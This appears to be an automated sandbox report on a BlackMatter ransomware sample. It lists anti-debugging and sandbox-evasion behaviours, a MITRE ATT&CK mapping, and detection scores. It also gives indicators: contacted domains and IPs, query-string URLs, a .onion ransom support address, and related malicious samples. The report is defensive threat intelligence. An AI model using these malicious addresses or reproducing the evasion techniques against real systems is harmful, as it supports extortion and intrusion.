          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeThread information set: HideFromDebuggerJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeThread information set: HideFromDebuggerJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeThread information set: HideFromDebuggerJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeThread information set: HideFromDebuggerJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeThread information set: HideFromDebuggerJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeThread information set: HideFromDebuggerJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeCode function: 0_2_010F57A7 LoadLibraryA,GetProcAddress,0_2_010F57A7
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeCode function: 0_2_010F1014 rdtsc 0_2_010F1014
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeCode function: 0_2_010F5F98 mov eax, dword ptr fs:[00000030h]0_2_010F5F98
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeCode function: 0_2_010FB790 mov ebx, dword ptr fs:[00000030h]0_2_010FB790
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeCode function: 0_2_010F5FB3 mov eax, dword ptr fs:[00000030h]0_2_010F5FB3
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeCode function: 0_2_010F5FCE mov eax, dword ptr fs:[00000030h]0_2_010F5FCE
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeCode function: 0_2_010F581D mov eax, dword ptr fs:[00000030h]0_2_010F581D
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeCode function: 0_2_010F153E mov eax, dword ptr fs:[00000030h]0_2_010F153E
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeCode function: 0_2_010F155E mov eax, dword ptr fs:[00000030h]0_2_010F155E
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeCode function: 0_2_010F6983 mov eax, dword ptr fs:[00000030h]0_2_010F6983
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeCode function: 0_2_010F95D6 mov ebx, dword ptr fs:[00000030h]0_2_010F95D6
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeCode function: 0_2_010F163A mov eax, dword ptr fs:[00000030h]0_2_010F163A
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeCode function: 0_2_010F1647 mov eax, dword ptr fs:[00000030h]0_2_010F1647
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeCode function: 0_2_010F82BF mov eax, dword ptr fs:[00000030h]0_2_010F82BF
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeCode function: 0_2_010F82BF mov eax, dword ptr fs:[00000030h]0_2_010F82BF
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeCode function: 0_2_010F85C8 LogonUserW,0_2_010F85C8
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeCode function: 0_2_010F1014 cpuid 0_2_010F1014
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeCode function: 0_2_010F8841 GetUserNameW,0_2_010F8841

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1Native API1Valid Accounts1Valid Accounts1Masquerading1OS Credential DumpingSecurity Software Discovery211Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationData Encrypted for Impact2
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsAccess Token Manipulation1Valid Accounts1LSASS MemoryVirtualization/Sandbox Evasion1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion1Security Account ManagerProcess Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Access Token Manipulation1NTDSAccount Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol4SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information1LSA SecretsSystem Owner/User Discovery1SSHKeyloggingData Transfer Size LimitsProxy1Manipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonSoftware Packing2Cached Domain CredentialsRemote System Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncFile and Directory Discovery2Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemSystem Information Discovery114Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          GlLHM7paoZ.exe87%VirustotalBrowse
          GlLHM7paoZ.exe77%MetadefenderBrowse
          GlLHM7paoZ.exe93%ReversingLabsWin32.Ransomware.BlackMatter
          GlLHM7paoZ.exe100%AviraTR/Crypt.EPACK.Gen2
          GlLHM7paoZ.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          0.2.GlLHM7paoZ.exe.10f0000.0.unpack100%AviraTR/Crypt.EPACK.Gen2Download File
          0.0.GlLHM7paoZ.exe.10f0000.0.unpack100%AviraTR/Crypt.EPACK.Gen2Download File

          Domains

          SourceDetectionScannerLabelLink
          paymenthacks.com15%VirustotalBrowse
          mojobiden.com14%VirustotalBrowse
          ww25.paymenthacks.com8%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://paymenthacks.com/?ztYdx0Q=9Jh2L4nBPBJechaF7&aLz8nwiFC=fVBFCEdqrnS06Ab&ZaNSaGgG3=maO6bGG6LAg&m0%Avira URL Cloudsafe
          http://ww25.paymenthacks.com/0%Avira URL Cloudsafe
          http://mojobiden.com/?wFdsAo=m8SxzzJYA8Cye0ZuIp&IIu7qt4s=9vaqCkIU&P0rY85r3g=3yWBtmW9ThsVHLPvT&NIzLa=0%Avira URL Cloudsafe
          http://supp24yy6a66hwszu2piygicgwzdtbwftb76htfj7vnip3getgqnzxid.onion/7NT6LXKC1XQHW5039BLOV.0%Avira URL Cloudsafe
          http://ww25.paymenthacks.com/?ztYdx0Q=9Jh2L4nBPBJechaF7&aLz8nwiFC=fVBFCEdqrnS06Ab&ZaNSaGgG3=maO6bGG60%Avira URL Cloudsafe
          https://mojobiden.com/?ztYdx0Q=9Jh2L4nBPBJechaF7&aLz8nwiFC=fVBFCEdqrnS06Ab&ZaNSaGgG3=maO6bGG6LAg&mi30%Avira URL Cloudsafe
          http://paymenthacks.com/?ztYdx0Q=9Jh2L4nBPBJechaF7&aLz8nwiFC=fVBFCEdqrnS06Ab&ZaNSaGgG3=maO6bGG6LAg&mi3fju3=SkxeAp3EGyy3E&fGep=oo79la8IfpgF2Pf&Ktpuhpgn=2pQNXS3RarpD2S&lzLC=HEaimaSUBS3zw0nFsZL&MNg=HhbZ8eK0%Avira URL Cloudsafe
          https://paymenthacks.com/?ztYdx0Q=9Jh2L4nBPBJechaF7&aLz8nwiFC=fVBFCEdqrnS06Ab&ZaNSaGgG3=maO6bGG6LAg&mi3fju3=SkxeAp3EGyy3E&fGep=oo79la8IfpgF2Pf&Ktpuhpgn=2pQNXS3RarpD2S&lzLC=HEaimaSUBS3zw0nFsZL&MNg=HhbZ8eK0%Avira URL Cloudsafe
          http://ww25.paymenthacks.com/?ztYdx0Q=9Jh2L4nBPBJechaF7&aLz8nwiFC=fVBFCEdqrnS06Ab&ZaNSaGgG3=maO6bGG6LAg&mi3fju3=SkxeAp3EGyy3E&fGep=oo79la8IfpgF2Pf&Ktpuhpgn=2pQNXS3RarpD2S&lzLC=HEaimaSUBS3zw0nFsZL&MNg=HhbZ8eK&subid1=20211024-1821-244d-afd2-7f2406ac953a0%Avira URL Cloudsafe
          http://paymenthacks.com/?wFdsAo=m8SxzzJYA8Cye0ZuIp&IIu7qt4s=9vaqCkIU&P0rY85r3g=3yWBtmW9ThsVHLPvT&NIz0%Avira URL Cloudsafe
          https://mojobiden.com/0%Avira URL Cloudsafe
          https://mojobiden.com/ments0%Avira URL Cloudsafe
          http://ww25.paymenthacks.com/?wFdsAo=m8SxzzJYA8Cye0ZuIp&IIu7qt4s=9vaqCkIU&P0rY85r3g=3yWBtmW9ThsVHLPv0%Avira URL Cloudsafe
          http://ww25.paymenthacks.com/?ztYdx0Q=9Jh2L4nBPBJechaF7&aLz8nwiFC=fVBFCEdqrnS06Ab&ZaNSaGgG3=maO6bGG6LAg&mi3fju3=SkxeAp3EGyy3E&fGep=oo79la8IfpgF2Pf&Ktpuhpgn=2pQNXS3RarpD2S&lzLC=HEaimaSUBS3zw0nFsZL&MNg=HhbZ8eK&subid1=20211024-1821-245b-b16a-e897805eb3ba0%Avira URL Cloudsafe
          http://mojobiden.com/?ztYdx0Q=9Jh2L4nBPBJechaF7&aLz8nwiFC=fVBFCEdqrnS06Ab&ZaNSaGgG3=maO6bGG6LAg&mi3f0%Avira URL Cloudsafe
          http://ww25.paymenthacks.com/u0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          paymenthacks.com
          103.224.212.222
          truetrueunknown
          77026.bodis.com
          199.59.242.153
          truefalse
            high
            mojobiden.com
            unknown
            unknowntrueunknown
            ww25.paymenthacks.com
            unknown
            unknowntrueunknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            http://paymenthacks.com/?ztYdx0Q=9Jh2L4nBPBJechaF7&aLz8nwiFC=fVBFCEdqrnS06Ab&ZaNSaGgG3=maO6bGG6LAg&mi3fju3=SkxeAp3EGyy3E&fGep=oo79la8IfpgF2Pf&Ktpuhpgn=2pQNXS3RarpD2S&lzLC=HEaimaSUBS3zw0nFsZL&MNg=HhbZ8eKtrue
            • Avira URL Cloud: safe
            unknown
            https://paymenthacks.com/?ztYdx0Q=9Jh2L4nBPBJechaF7&aLz8nwiFC=fVBFCEdqrnS06Ab&ZaNSaGgG3=maO6bGG6LAg&mi3fju3=SkxeAp3EGyy3E&fGep=oo79la8IfpgF2Pf&Ktpuhpgn=2pQNXS3RarpD2S&lzLC=HEaimaSUBS3zw0nFsZL&MNg=HhbZ8eKtrue
            • Avira URL Cloud: safe
            unknown
            http://ww25.paymenthacks.com/?ztYdx0Q=9Jh2L4nBPBJechaF7&aLz8nwiFC=fVBFCEdqrnS06Ab&ZaNSaGgG3=maO6bGG6LAg&mi3fju3=SkxeAp3EGyy3E&fGep=oo79la8IfpgF2Pf&Ktpuhpgn=2pQNXS3RarpD2S&lzLC=HEaimaSUBS3zw0nFsZL&MNg=HhbZ8eK&subid1=20211024-1821-244d-afd2-7f2406ac953atrue
            • Avira URL Cloud: safe
            unknown
            http://ww25.paymenthacks.com/?ztYdx0Q=9Jh2L4nBPBJechaF7&aLz8nwiFC=fVBFCEdqrnS06Ab&ZaNSaGgG3=maO6bGG6LAg&mi3fju3=SkxeAp3EGyy3E&fGep=oo79la8IfpgF2Pf&Ktpuhpgn=2pQNXS3RarpD2S&lzLC=HEaimaSUBS3zw0nFsZL&MNg=HhbZ8eK&subid1=20211024-1821-245b-b16a-e897805eb3batrue
            • Avira URL Cloud: safe
            unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://paymenthacks.com/?ztYdx0Q=9Jh2L4nBPBJechaF7&aLz8nwiFC=fVBFCEdqrnS06Ab&ZaNSaGgG3=maO6bGG6LAg&mGlLHM7paoZ.exe, 00000000.00000003.356398285.00000000012FB000.00000004.00000001.sdmptrue
            • Avira URL Cloud: safe
            unknown
            http://ww25.paymenthacks.com/GlLHM7paoZ.exe, 00000000.00000003.279368947.00000000012FB000.00000004.00000001.sdmptrue
            • Avira URL Cloud: safe
            unknown
            http://mojobiden.com/?wFdsAo=m8SxzzJYA8Cye0ZuIp&IIu7qt4s=9vaqCkIU&P0rY85r3g=3yWBtmW9ThsVHLPvT&NIzLa=GlLHM7paoZ.exe, 00000000.00000003.356398285.00000000012FB000.00000004.00000001.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://supp24yy6a66hwszu2piygicgwzdtbwftb76htfj7vnip3getgqnzxid.onion/7NT6LXKC1XQHW5039BLOV.GlLHM7paoZ.exe, 00000000.00000003.279368947.00000000012FB000.00000004.00000001.sdmp, kVuoJyeoW.README.txt7.0.drtrue
            • Avira URL Cloud: safe
            unknown
            http://ww25.paymenthacks.com/?ztYdx0Q=9Jh2L4nBPBJechaF7&aLz8nwiFC=fVBFCEdqrnS06Ab&ZaNSaGgG3=maO6bGG6GlLHM7paoZ.exe, 00000000.00000003.279368947.00000000012FB000.00000004.00000001.sdmp, GlLHM7paoZ.exe, 00000000.00000003.356398285.00000000012FB000.00000004.00000001.sdmp, GlLHM7paoZ.exe, 00000000.00000002.359922754.00000000012F6000.00000004.00000020.sdmp, GlLHM7paoZ.exe, 00000000.00000002.359911192.00000000012DE000.00000004.00000020.sdmp, GlLHM7paoZ.exe, 00000000.00000003.279363599.00000000012F3000.00000004.00000001.sdmp, GlLHM7paoZ.exe, 00000000.00000003.342654946.00000000012FE000.00000004.00000001.sdmptrue
            • Avira URL Cloud: safe
            unknown
            https://mojobiden.com/?ztYdx0Q=9Jh2L4nBPBJechaF7&aLz8nwiFC=fVBFCEdqrnS06Ab&ZaNSaGgG3=maO6bGG6LAg&mi3GlLHM7paoZ.exe, 00000000.00000003.356398285.00000000012FB000.00000004.00000001.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://paymenthacks.com/?wFdsAo=m8SxzzJYA8Cye0ZuIp&IIu7qt4s=9vaqCkIU&P0rY85r3g=3yWBtmW9ThsVHLPvT&NIzGlLHM7paoZ.exe, 00000000.00000003.356795940.0000000001354000.00000004.00000001.sdmptrue
            • Avira URL Cloud: safe
            unknown
            https://mojobiden.com/GlLHM7paoZ.exe, 00000000.00000003.356795940.0000000001354000.00000004.00000001.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://mojobiden.com/mentsGlLHM7paoZ.exe, 00000000.00000002.359911192.00000000012DE000.00000004.00000020.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://www.torproject.org/).GlLHM7paoZ.exe, 00000000.00000003.279368947.00000000012FB000.00000004.00000001.sdmp, kVuoJyeoW.README.txt7.0.drfalse
              high
              http://ww25.paymenthacks.com/?wFdsAo=m8SxzzJYA8Cye0ZuIp&IIu7qt4s=9vaqCkIU&P0rY85r3g=3yWBtmW9ThsVHLPvGlLHM7paoZ.exe, 00000000.00000003.356398285.00000000012FB000.00000004.00000001.sdmp, GlLHM7paoZ.exe, 00000000.00000002.359922754.00000000012F6000.00000004.00000020.sdmptrue
              • Avira URL Cloud: safe
              unknown
              http://mojobiden.com/?ztYdx0Q=9Jh2L4nBPBJechaF7&aLz8nwiFC=fVBFCEdqrnS06Ab&ZaNSaGgG3=maO6bGG6LAg&mi3fGlLHM7paoZ.exe, 00000000.00000003.356795940.0000000001354000.00000004.00000001.sdmp, GlLHM7paoZ.exe, 00000000.00000003.342688022.0000000001354000.00000004.00000001.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://ww25.paymenthacks.com/uGlLHM7paoZ.exe, 00000000.00000003.279368947.00000000012FB000.00000004.00000001.sdmptrue
              • Avira URL Cloud: safe
              unknown

              Contacted IPs

              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs

              Public

              IPDomainCountryFlagASNASN NameMalicious
              199.59.242.153
              77026.bodis.comUnited States
              395082BODIS-NJUSfalse
              103.224.212.222
              paymenthacks.comAustralia
              133618TRELLIAN-AS-APTrellianPtyLimitedAUtrue

              General Information

              Joe Sandbox Version:33.0.0 White Diamond
              Analysis ID:508200
              Start date:24.10.2021
              Start time:09:20:32
              Joe Sandbox Product:CloudBasic
              Overall analysis duration:0h 5m 20s
              Hypervisor based Inspection enabled:false
              Report type:full
              Sample file name:GlLHM7paoZ.exe
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
              Number of analysed new started processes analysed:26
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • HDC enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Detection:MAL
              Classification:mal100.rans.evad.winEXE@1/176@6/2
              EGA Information:
              • Successful, ratio: 100%
              HDC Information:
              • Successful, ratio: 99.2% (good quality ratio 63.7%)
              • Quality average: 43.5%
              • Quality standard deviation: 39.4%
              HCA Information:Failed
              Cookbook Comments:
              • Adjust boot time
              • Enable AMSI
              • Found application associated with file extension: .exe
              Warnings:
              Show All
              • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, VSSVC.exe, svchost.exe, wuapihost.exe
              • Excluded IPs from analysis (whitelisted): 23.211.4.86, 20.82.209.183, 173.222.108.210, 173.222.108.226, 20.199.120.182, 20.199.120.85, 80.67.82.211, 80.67.82.235, 20.54.110.249, 40.112.88.60, 20.50.102.62, 20.199.120.151, 23.203.78.112, 23.203.67.116
              • Excluded domains from analysis (whitelisted): a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, e15275.g.akamaiedge.net, arc.msn.com, cdn.onenote.net.edgekey.net, wns.notify.trafficmanager.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, wildcard.weather.microsoft.com.edgekey.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, cdn.onenote.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, client.wns.windows.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, tile-service.weather.microsoft.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, e1553.dspg.akamaiedge.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
              • Not all processes where analyzed, report is missing behavior information
              • Report size getting too big, too many NtOpenFile calls found.
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtProtectVirtualMemory calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.

              Simulations

              Behavior and APIs

              No simulations

              Joe Sandbox View / Context

              IPs

              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
              199.59.242.153HTK TT600202109300860048866 Payment Proof.pdf.exeGet hashmaliciousBrowse
              • www.cnnautorepair.com/euzn/?BZLHP=wNIAPwczIIPW06QRNMfe7+BVdOa1VJYO3ZqC2ehyT6EzXc1t+pBwM5o+dGxGLIVEd5bT&TlTd=3fQxPL6PF
              oacNxjkyOK.exeGet hashmaliciousBrowse
              • www.wwwmwrfinancial.com/ons6/?XfrpLn7h=iGZirITFeZSOuk1H5CsSTBn/b12Z8EC6YgPeJTtI1VYITjHIt9scVaoFn5Fth1/5B85F&t2Mp=cHPxvxKpXXcDTFG
              4OlVYrynpO.exeGet hashmaliciousBrowse
              • www.phillytrainers.com/fqiq/?w0=KVmNRShPNEpZevdJ0GVoBN6bf0NNqipfcm8rTiotuO7nZEtgIUyDqdbZvM5j+nixBitQ&yP5Pe=z2MHIXLxnvq0ZjT
              mkjnI5hbhI.exeGet hashmaliciousBrowse
              • www.phillytrainers.com/fqiq/?IN643ZF0=KVmNRShPNEpZevdJ0GVoBN6bf0NNqipfcm8rTiotuO7nZEtgIUyDqdbZvM5j+nixBitQ&aJBX0=PzuD_l
              DHL AWB 00929928288.exeGet hashmaliciousBrowse
              • www.homestyle.online/p0on/?j6A4shD=OJcVOGbmtAV6+X8cW0v8hka/GtxqnLjyGmi+zwjjgckmcwtTT3JMbL8IDx/Fh7j0xRKv&7neDKv=F8CLZJ
              soa_02010021.exeGet hashmaliciousBrowse
              • www.hairuno.com/nqn4/?-ZddGje=xQ77bd/8ka8+uLT+yjCt7f7OTK33yU4OXkqRx1aZ0TRYlGJxgHYF5u7lELM7J9J/CgNW&3ffLp=fp_T0dZXgD
              CXVlBV2Bya.exeGet hashmaliciousBrowse
              • www.srofkansas.com/fqiq/?f0GxZ=wFDpWBcwGUwbYImhJwxG8GxnrXCHdVwe5dx/e1T/Cf34keqj4Yi5GaObIIqtab2MVij/&9rM=SL04qF
              7akn2hhXCM.exeGet hashmaliciousBrowse
              • www.phillytrainers.com/fqiq/?pZYXXHg=KVmNRShPNEpZevdJ0GVoBN6bf0NNqipfcm8rTiotuO7nZEtgIUyDqdbZvM5j+nixBitQ&vZ=WVSH
              Doc_008543678.exeGet hashmaliciousBrowse
              • www.yukinko-takasu.com/yjqn/?7n=4JaxidlsEi6dS6bsIrWA9H5oDo+sUA1VC+fy9m82cyrxL0qrN0fUweDulObZP7zXAY71&nV=1b9pvn
              M0RRbGEb0u.exeGet hashmaliciousBrowse
              • www.myverizonbillpay.com/hr8n/?cXOPjf=6lfPwV1Hl&9rGP5B=ILCQys4W2nmI16PHUn3vKB7/UprAS8tji7H+tefUzZaDXaBN/QiF2o4GX30/ddJTdNAK
              7UMLyz3hby.exeGet hashmaliciousBrowse
              • www.gafoodstamps.com/mexq/?ZVqLF4=aujtepI6qRwt4NWlDzxdhSPeB9mp7HwM3P6GccjuQrHNTxqttOPLCNBNcH4bMoCm5uRW&0b00dJ=3fbLp2DhNvq4z2
              t8MQow7sN9.exeGet hashmaliciousBrowse
              • www.phillytrainers.com/fqiq/?4hoPA8=KVmNRShPNEpZevdJ0GVoBN6bf0NNqipfcm8rTiotuO7nZEtgIUyDqdbZvM5JhXSxFglQ&b6Al=nTuD_
              Wellis Inquiry.exeGet hashmaliciousBrowse
              • www.ovmfinacial.com/ag9v/?9rq=vpuErUH2OwLAPGAltxg3/Zj6XscnxJenLEapnG3NwgRlKVIYyl0HnfsKneQfORBHqYbR&BFQ=5jI0jhMHA0hx_
              010013.exeGet hashmaliciousBrowse
              • www.lifestyleeve.com/o4ms/?X61HiLc=8GNZfXhxkQPDp/0Q3wwiQDJ4fZPKroBOtzHsTvHuSmq05FSo/HrWX19J684oFY+7hHWk&jHPhl=5jo4ZxbHw
              XaTgTJhfol.exeGet hashmaliciousBrowse
              • www.gafoodstamps.com/mexq/?v2JP=aujtepI6qRwt4NWlDzxdhSPeB9mp7HwM3P6GccjuQrHNTxqttOPLCNBNcH4bMoCm5uRW&GZ_=4h-TkZ9hp8gh-
              6pa7yRpcFt.exeGet hashmaliciousBrowse
              • www.myverizonbillpay.com/hr8n/?f0DDp6RH=ILCQys4W2nmI16PHUn3vKB7/UprAS8tji7H+tefUzZaDXaBN/QiF2o4GX0UFNMprHqhN&8pNLu=7nGt2pBPBx
              Emask230921doc.exeGet hashmaliciousBrowse
              • www.newyroklifeannuities.com/x9r4/?7n0=R48xY&c2Jp7Bc0=lcZHIyAd6OHv52M4P4oACjlfZtfJGnVbGUlMndCBdmn5tcdEwHSZ2MqsoIPmB/a4+IEQ
              Invoice Packing list.exeGet hashmaliciousBrowse
              • www.vspfotme.com/eods/?6liXpZH=EJMYTlsbPcKMchoi/NCYrSOUkQ1lcyycXKbirIJaFNH/FpU7Xng2HIBKTdIWJb6tzkCK&EBPLR=cVnDMB4H0pL
              D8043D746DC108AC0966B502B68DDEABA575E841EDFA2.exeGet hashmaliciousBrowse
              • ww1.survey-smiles.com/
              Productivity.exeGet hashmaliciousBrowse
              • ww1.thefreesmsapp.com/_tr

              Domains

              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
              77026.bodis.comhttp://blackberry.proGet hashmaliciousBrowse
              • 199.59.242.153
              http://tyc588888.com/test.txt?.phpGet hashmaliciousBrowse
              • 199.59.242.153
              paymenthacks.comFaHdx8tldN.exeGet hashmaliciousBrowse
              • 206.188.197.206
              R5L9IoaG67.exeGet hashmaliciousBrowse
              • 206.188.197.206
              it2TiN2UtR.exeGet hashmaliciousBrowse
              • 206.188.197.206

              ASN

              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
              TRELLIAN-AS-APTrellianPtyLimitedAUgm3iq8EKio.exeGet hashmaliciousBrowse
              • 103.224.212.221
              n7gjtO4ZwD.exeGet hashmaliciousBrowse
              • 103.224.212.222
              po.exeGet hashmaliciousBrowse
              • 103.224.182.246
              o4EjNRKCKq.exeGet hashmaliciousBrowse
              • 103.224.182.244
              PO03214890.exeGet hashmaliciousBrowse
              • 103.224.212.219
              siam.exeGet hashmaliciousBrowse
              • 103.224.212.220
              vYdNoArXo0.exeGet hashmaliciousBrowse
              • 103.224.212.221
              Ord20210810837005935168.exeGet hashmaliciousBrowse
              • 103.224.212.222
              pmvJAhEzd3.exeGet hashmaliciousBrowse
              • 103.224.182.210
              solicitud de presupuesto.exeGet hashmaliciousBrowse
              • 103.224.212.220
              DcgPw20VOI.exeGet hashmaliciousBrowse
              • 103.224.212.220
              7wrbIuHmx6.exeGet hashmaliciousBrowse
              • 103.224.182.210
              Cl8RbDkHcC.exeGet hashmaliciousBrowse
              • 103.224.182.210
              Productivity.exeGet hashmaliciousBrowse
              • 103.224.212.228
              Productivity.exeGet hashmaliciousBrowse
              • 103.224.212.228
              vg7OaNVgqD.exeGet hashmaliciousBrowse
              • 103.224.182.210
              DN02468001.exeGet hashmaliciousBrowse
              • 103.224.182.210
              StarFireTV-BOX-2.0.1.9-GDaily.org.apkGet hashmaliciousBrowse
              • 103.224.212.221
              StarFireTV-BOX-2.0.1.9-GDaily.org.apkGet hashmaliciousBrowse
              • 103.224.212.221
              Updated SOA 210920.PDF.exeGet hashmaliciousBrowse
              • 103.224.212.221
              BODIS-NJUSHTK TT600202109300860048866 Payment Proof.pdf.exeGet hashmaliciousBrowse
              • 199.59.242.153
              oacNxjkyOK.exeGet hashmaliciousBrowse
              • 199.59.242.153
              4OlVYrynpO.exeGet hashmaliciousBrowse
              • 199.59.242.153
              mkjnI5hbhI.exeGet hashmaliciousBrowse
              • 199.59.242.153
              Shipping Documents.exeGet hashmaliciousBrowse
              • 199.59.243.200
              DHL AWB 00929928288.exeGet hashmaliciousBrowse
              • 199.59.242.153
              soa_02010021.exeGet hashmaliciousBrowse
              • 199.59.242.153
              CXVlBV2Bya.exeGet hashmaliciousBrowse
              • 199.59.242.153
              7akn2hhXCM.exeGet hashmaliciousBrowse
              • 199.59.242.153
              Doc_008543678.exeGet hashmaliciousBrowse
              • 199.59.242.153
              M0RRbGEb0u.exeGet hashmaliciousBrowse
              • 199.59.242.153
              7UMLyz3hby.exeGet hashmaliciousBrowse
              • 199.59.242.153
              t8MQow7sN9.exeGet hashmaliciousBrowse
              • 199.59.243.200
              Wellis Inquiry.exeGet hashmaliciousBrowse
              • 199.59.242.153
              010013.exeGet hashmaliciousBrowse
              • 199.59.242.153
              XaTgTJhfol.exeGet hashmaliciousBrowse
              • 199.59.242.153
              6pa7yRpcFt.exeGet hashmaliciousBrowse
              • 199.59.242.153
              drolnux.exeGet hashmaliciousBrowse
              • 199.59.242.153
              Emask230921doc.exeGet hashmaliciousBrowse
              • 199.59.242.153
              Invoice Packing list.exeGet hashmaliciousBrowse
              • 199.59.242.153

              JA3 Fingerprints

              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
              37f463bf4616ecd445d4a1937da06e19365F984ABE68DDD398D7B749FB0E69B0F29DAF86F0E3E.exeGet hashmaliciousBrowse
              • 103.224.212.222
              vPikjjU8uE.exeGet hashmaliciousBrowse
              • 103.224.212.222
              HIC INTERNATIONAL - REQUEST FOR QUOTATION DOCUMENTS.exeGet hashmaliciousBrowse
              • 103.224.212.222
              biz-1651663957.xlsGet hashmaliciousBrowse
              • 103.224.212.222
              L63g4g65zg.exeGet hashmaliciousBrowse
              • 103.224.212.222
              Pv9HB349oG.exeGet hashmaliciousBrowse
              • 103.224.212.222
              Wcu8HO5-WZHC1H-XIJ5.htmGet hashmaliciousBrowse
              • 103.224.212.222
